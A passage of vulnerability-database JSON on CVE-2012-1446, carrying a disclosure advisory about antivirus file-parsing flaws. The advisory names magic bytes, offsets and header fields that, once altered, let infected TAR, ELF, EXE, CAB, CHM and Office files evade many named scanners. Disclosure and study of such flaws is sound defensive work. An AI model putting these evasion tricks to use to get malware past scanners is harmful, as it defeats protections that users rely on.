{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Gateway Security and CA Total Defense Used in CA Gateway Security for HTTP of Icihttp.exe Vulnerable to arbitrary code execution",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 0.6
}
}
VAR-201203-0370
Vulnerability from variot - Updated: 2025-04-11 22:49The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. Multiple products ELF A file parser contains a vulnerability that can prevent malware detection. Different ELF If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.Changed by a third party encoding With field ELF Malware detection may be avoided via files. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.
Vulnerability Descriptions
- Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.
Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00
CVE no - CVE-2012-1419
- Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03
CVE no - CVE-2012-1420
- Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103
CVE no - CVE-2012-1421
- Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1422
- Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.
Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0
CVE no - CVE-2012-1423
- Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0
CVE no - CVE-2012-1424
- Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1426
- Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1427
- Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1428
- Specially crafted infected ELF files with "ustar" at offset 257 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01
CVE no - CVE-2012-1429 12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1430 13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1431
- Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1432
- Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1433
- Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1434
- Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1435
- Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1436
- Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.
Affected products - Comodo 7425
CVE no - CVE-2012-1437
- Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.
Affected products - Comodo 7425, Sophos 4.61.0
CVE no - CVE-2012-1438
- 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1439
- 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.
Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1440
- 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.
Affected products - Prevx 3.0
'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',
'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and
'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1
it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0
CVE no - CVE-2012-1441
- 'class' field in ELF files is parsed incorrectly.
If an infected ELF file's class field is incremented by 1 it evades detection. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.
Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2
CVE no - CVE-2012-1443
- 'abiversion' field in ELF files is parsed incorrectly.
If an infected ELF file's abiversion field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1444
- 'abi' field in ELF files is parsed incorrectly.
If an infected ELF file's abi field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1445
- 'e_version' field in ELF files is parsed incorrectly.
If an infected ELF file's e_version field is incremented by 1 it evades detection.
Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7
CVE no - CVE-2012-1447
- 'cbCabinet' field in CAB files is parsed incorrectly.
If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1
CVE no - CVE-2012-1448
- 'vMajor' field in CAB files is parsed incorrectly.
If an infected CAB file's vMajor field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1449
- 'reserved3' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1450
- 'reserved2' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved2 field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1451
- 'reserved1' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00
CVE no - CVE-2012-1452
- 'coffFiles' field in CAB files is parsed incorrectly.
If an infected CAB file's coffFiles field is incremented by 1 it evades detection. 'ei_version' field in ELF files is parsed incorrectly.
If an infected ELF file's version field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1454
- 'vMinor' field in CAB files is parsed incorrectly.
If an infected CAB file's version field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1455
- A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1457
- A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.
If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.
Affected products - ClamAV 0.96.4, Sophos 4.61.0
CVE no - CVE-2012-1458
- In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.
If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2
CVE no - CVE-2012-1460
- GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes
Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103
CVE no - CVE-2012-1462
- In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.
Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7
CVE no - CVE-2012-1463
Credits
Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.
References
"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0370",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "avl sdk",
"scope": "eq",
"trust": 1.8,
"vendor": "antiy",
"version": "2.0.3.7"
},
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "pc tools",
"version": "7.0.3.5"
},
{
"model": "esafe",
"scope": "eq",
"trust": 1.8,
"vendor": "aladdin",
"version": "7.0.17.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "kaspersky",
"version": "7.0.0.125"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "sophos",
"version": "4.61.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "scan engine",
"scope": "eq",
"trust": 1.8,
"vendor": "mcafee",
"version": "5.400.0.1158"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "endpoint protection",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "quick heal",
"scope": "eq",
"trust": 1.0,
"vendor": "cat",
"version": "11.00"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "rising global",
"version": "22.83.00.03"
},
{
"model": "antivirus \\\u0026 antispyware",
"scope": "eq",
"trust": 1.0,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "rising",
"version": "22.83.00.03"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "heal",
"scope": "eq",
"trust": 0.8,
"vendor": "quick heal k k",
"version": "11.00"
},
{
"model": "endpoint protection",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "11"
},
{
"model": "web gateway software",
"scope": "eq",
"trust": 0.8,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "20101.3103"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "4.61"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "rising",
"version": "22.8303"
},
{
"model": "cat-quickheal",
"scope": "eq",
"trust": 0.3,
"vendor": "quick heal",
"version": "11.00"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "pctools",
"version": "7.0.35"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "norman",
"version": "6.6.12"
},
{
"model": "mcafee-gw-edition 2010.1c",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "7.0125"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
},
{
"model": "antiy-avl",
"scope": "eq",
"trust": 0.3,
"vendor": "antiy",
"version": "2.0.37"
}
],
"sources": [
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:antiy:avl_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:rising-global:rising_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_vet_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:norman:norman_antivirus_%26_antispyware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:pandasecurity:panda_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:pc_tools:pc_tools_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:aladdin:esafe",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:kaspersky:kaspersky_anti-virus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:quick_heal:quick_heal",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:symantec:endpoint_protection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sophos:anti-virus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fortinet:fortinet_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:scan_engine",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:web_gateway",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52600"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1446",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-1446",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54727",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-1446",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-1446",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-410",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54727",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. Multiple products ELF A file parser contains a vulnerability that can prevent malware detection. Different ELF If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.Changed by a third party encoding With field ELF Malware detection may be avoided via files. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n evades detection. \n\n Affected products -\n ClamAV 0.96.4, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n Symantec 20101.3.0.103\n\n CVE no - \n CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n evades detection. \n\n Affected products -\n Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n CVE no - \n CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n evades detection. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n PCTools 7.0.3.5, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n 4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n 3 bytes evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n offset 29 evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n evades detection. \n \n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n evades detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, 